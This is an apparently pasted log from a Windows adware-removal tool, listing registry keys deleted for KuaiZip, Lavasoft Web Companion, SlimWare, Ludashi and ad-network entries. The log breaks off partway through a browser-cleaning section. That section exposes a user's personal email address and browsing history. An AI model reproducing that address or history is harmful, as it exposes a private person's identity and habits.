    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.072
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.073
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.074
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.075
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.076
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.077
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.078
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.079
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.08
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.080
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.081
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.082
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.083
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.084
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.085
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.086
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.087
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.088
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.089
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.09
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.090
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.091
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.092
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.093
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.094
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.095
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.096
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.097
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.098
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.099
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.7z
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.apk
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.arj
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.bz2
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.cab
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.gz
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.gzip
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.jar
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.kz
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.lzh
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.mou
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.rar
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.rpm
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.tar
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.tbz
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.tgz
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.wim
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.z
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.zip
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.zipx
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip_FileAsso_Origin
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataContainer
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataContainer.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataController
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataController.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTable
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTable.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableFields
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableFields.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableHolder
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableHolder.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.LSPLogic
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.LSPLogic.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.ReadOnlyManager
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.ReadOnlyManager.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.WFPController
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.WFPController.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\PCSU.SysUtils
    [-] Key deleted: HKLM\SOFTWARE\Classes\PCSU.SysUtils.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell2.ContextMenuExt
    [-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell2.ContextMenuExt.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell2.DragDropMenu
    [-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell2.DragDropMenu.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell2.KYDropHandler
    [-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell2.KYDropHandler.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell2.KzShlobj
    [-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell2.KzShlobj.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.001
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.002
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.003
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.004
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.005
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.006
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.007
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.008
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.009
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.01
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.010
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.011
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.012
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.013
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.014
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.015
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.016
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.017
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.018
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.019
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.02
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.020
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.021
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.022
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.023
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.024
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.025
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.026
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.027
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.028
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.029
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.03
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.030
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.031
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.032
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.033
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.034
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.035
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.036
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.037
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.038
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.039
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.04
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.040
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.041
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.042
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.043
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.044
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.045
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.046
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.047
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.048
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.049
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.05
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.050
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.051
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.052
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.053
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.054
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.055
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.056
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.057
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.058
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.059
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.06
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.060
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.061
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.062
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.063
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.064
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.065
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.066
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.067
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.068
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.069
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.07
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.070
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.071
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.072
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.073
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.074
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.075
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.076
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.077
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.078
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.079
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.08
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.080
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.081
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.082
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.083
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.084
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.085
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.086
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.087
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.088
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.089
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.09
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.090
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.091
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.092
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.093
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.094
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.095
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.096
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.097
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.098
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.099
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.7z
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.apk
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.arj
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.bz2
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.cab
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.gz
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.gzip
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.jar
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.kz
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.lzh
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.mou
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.rar
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.rpm
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.tar
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.tbz
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.tgz
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.wim
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.z
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.zip
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.zipx
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip_FileAsso_Origin
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataContainer
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataContainer.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataController
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataController.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTable
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTable.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableFields
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableFields.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableHolder
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableHolder.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.LSPLogic
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.LSPLogic.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.ReadOnlyManager
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.ReadOnlyManager.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.WFPController
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.WFPController.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\PCSU.SysUtils
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\PCSU.SysUtils.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell2.ContextMenuExt
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell2.ContextMenuExt.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell2.DragDropMenu
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell2.DragDropMenu.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell2.KYDropHandler
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell2.KYDropHandler.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell2.KzShlobj
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell2.KzShlobj.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{425F4ABF-B8E4-402D-9E49-06E494EB8DBF}
    [-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{9CC34070-3A38-4C7A-89CB-EF8177EF07A1}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{B89F5C49-51DB-4974-AB5A-E25901AA339C}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{E9B5B0D2-D08A-49FC-8B5C-159B60BAA268}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{08ACFB57-8187-47F0-AF93-56360D03634A}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{0015CAC9-FC30-4CD0-BFAA-7412CC2C4DD9}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{26C7AFDB-3690-449E-B979-B0AF5CC56DD4}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{3A5A5381-DAAF-4C0D-B032-2C66B3EE4A8D}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{472EF1D2-4AAE-470D-AE85-6AF8177916FD}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{8F010D54-C023-457F-AF03-497EACB6D519}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{9A754403-27B1-4ED7-96D7-588F07888EBF}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{CB31FF8F-BF80-4D2B-ADBE-12C6F5347890}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{FCAA532B-E807-4027-940C-BA16B9D50105}
    [-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{6C42038D-817A-472C-8C2A-EF46F1DA576D}
    [-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{873C7DA8-195D-4D5A-B830-C5E2831901EA}
    [-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{ED62BC6E-64F1-46BE-866F-4C8DC0DF7057}
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\FastCompress-Zip
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\K9Tools
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Tinstalls
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\SlimWare Utilities Inc
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\osTip
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\INSTALLPATH\STATUS
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\SNDA
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Ludashi
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\AppDataLow\Software\WikiZ
    [#] Key deleted on reboot: HKCU\Software\FastCompress-Zip
    [#] Key deleted on reboot: HKCU\Software\K9Tools
    [#] Key deleted on reboot: HKCU\Software\Microsoft\Tinstalls
    [#] Key deleted on reboot: HKCU\Software\SlimWare Utilities Inc
    [#] Key deleted on reboot: HKCU\Software\osTip
    [#] Key deleted on reboot: HKCU\Software\INSTALLPATH\STATUS
    [#] Key deleted on reboot: HKCU\Software\SNDA
    [#] Key deleted on reboot: HKCU\Software\Ludashi
    [#] Key deleted on reboot: HKCU\Software\AppDataLow\Software\WikiZ
    [-] Key deleted: HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
    [-] Key deleted: HKLM\SOFTWARE\FastCompress-Zip
    [-] Key deleted: HKLM\SOFTWARE\K9Tools
    [-] Key deleted: HKLM\SOFTWARE\SearchModule
    [-] Key deleted: HKLM\SOFTWARE\SlimWare Utilities Inc
    [-] Key deleted: HKLM\SOFTWARE\Lavasoft\Web Companion
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\{94ebd7b5-82ae-449t-b679-3d04078ed154}
    [-] Key deleted: HKLM\SOFTWARE\Xtp
    [-] Key deleted: HKLM\SOFTWARE\Ludashi
    [-] Key deleted: HKLM\SOFTWARE\ComputerZ
    [-] Key deleted: HKLM\SOFTWARE\MustangUp
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
    [#] Key deleted on reboot: [x64] HKCU\Software\FastCompress-Zip
    [#] Key deleted on reboot: [x64] HKCU\Software\K9Tools
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Tinstalls
    [#] Key deleted on reboot: [x64] HKCU\Software\SlimWare Utilities Inc
    [#] Key deleted on reboot: [x64] HKCU\Software\osTip
    [#] Key deleted on reboot: [x64] HKCU\Software\INSTALLPATH\STATUS
    [#] Key deleted on reboot: [x64] HKCU\Software\SNDA
    [#] Key deleted on reboot: [x64] HKCU\Software\Ludashi
    [#] Key deleted on reboot: [x64] HKCU\Software\AppDataLow\Software\WikiZ
    [-] Key deleted: [x64] HKLM\SOFTWARE\SearchModule
    [-] Key deleted: [x64] HKLM\SOFTWARE\Xtp
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\50D2BAFD096C90345A82B25A790BDF69
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\50D2BAFD096C90345A82B25A790BDF69
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\50D2BAFD096C90345A82B25A790BDF69
    [-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\adnetworkperformance.com
    [-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\castplatform.com
    [-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cdn.castplatform.com
    [-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\navsmart.info
    [-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\nps.pastaleads.com
    [-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pastaleads.com
    [-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\utop.it
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\adnetworkperformance.com
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\castplatform.com
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cdn.castplatform.com
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\navsmart.info
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\nps.pastaleads.com
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pastaleads.com
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\utop.it
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [EasyHotspot]
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Class\{0C95ABFE-4FB6-49DB-B22F-0E1F5FC4BEEC}
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Class\{EEEFACB3-729F-4484-B66D-E7A7917BBFC1}
    [-] Key deleted: HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RONZAP.EXE
    [-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com


    ***** [ Web browsers ] *****

    [-] Chrome preferences cleaned: "browser.newtabpage.pinned" - "[{\"url\":\"hxxp://www.cloudynights.com/forum/62-classic-telescopes/\",\"title\":\"Classic Telescopes - Cloudy Nights\",\"frecency\":286,\"lastVisitDate\":1453415097015000,\"type\":\"history\",\"baseDomain\":\"cloudynights.com\"},{\"url\":\"hxxp://www.youtube.com/\",\"title\":null,\"frecency\":5100,\"lastVisitDate\":1454810685825000,\"type\":\"history\",\"baseDomain\":\"youtube.com\"},{\"url\":\"hxxp://www.astrobuysell.com/\",\"title\":\"Canada-wide Astronomy Buy & Sell\",\"frecency\":1901,\"lastVisitDate\":1453414415859000,\"type\":\"history\",\"baseDomain\":\"astrobuysell.com\"},{\"url\":\"hxxps://mail.google.com/mail/#inbox\",\"title\":\"Inbox - ftomaras@gmail.com - Gmail\",\"frecency\":640,\"lastVisitDate\":1454110340463000,\"type\":\"history\",\"baseDomain\":\"mail.google.com\"},{\"url\":\"hxxp://www.stellarium.org/en_CA/\",\"title\":\"Stellarium\",\"frecency\":190,\"lastVisitDate\":1453424189162000,\"type\":\"history\",\"baseDomain\":\"stellarium.org\"},{\"url\":\"hxxp://www.mail.com/int/\",\"title\":\"Free Email Addresses: Web based and secure Email - mail.com\",\"frecency\":2063,\"lastVisitDate\":1454110953269000,\"type\":\"history\",\"baseDomain\":\"mail.com\"},{\"url\":\"hxxps://en.wikipedia.org/wiki/Sicilian_Vampire\",\"frecency\":100,\"lastVisitDate\":1454812961365000,\"type\":\"history\",\"baseDomain\":\"en.wikipedia.org\",\"title\":\"Sicilian Vampire - Wikipedia, the free encyclopedia\"},{\"url\":\"hxxp://ap-i.net/avl/en/download\",\"title\":\"en:download [Virtual Moon Atlas]\",\"frecency\":190,\"lastVisitDate\":1453419905247000,\"type\":\"history\",\"baseDomain\":\"ap-i.net\"},{\"url\":\"hxxp://virtual-moon-atlas.en.softonic.com/download\",\"title\":\"Download 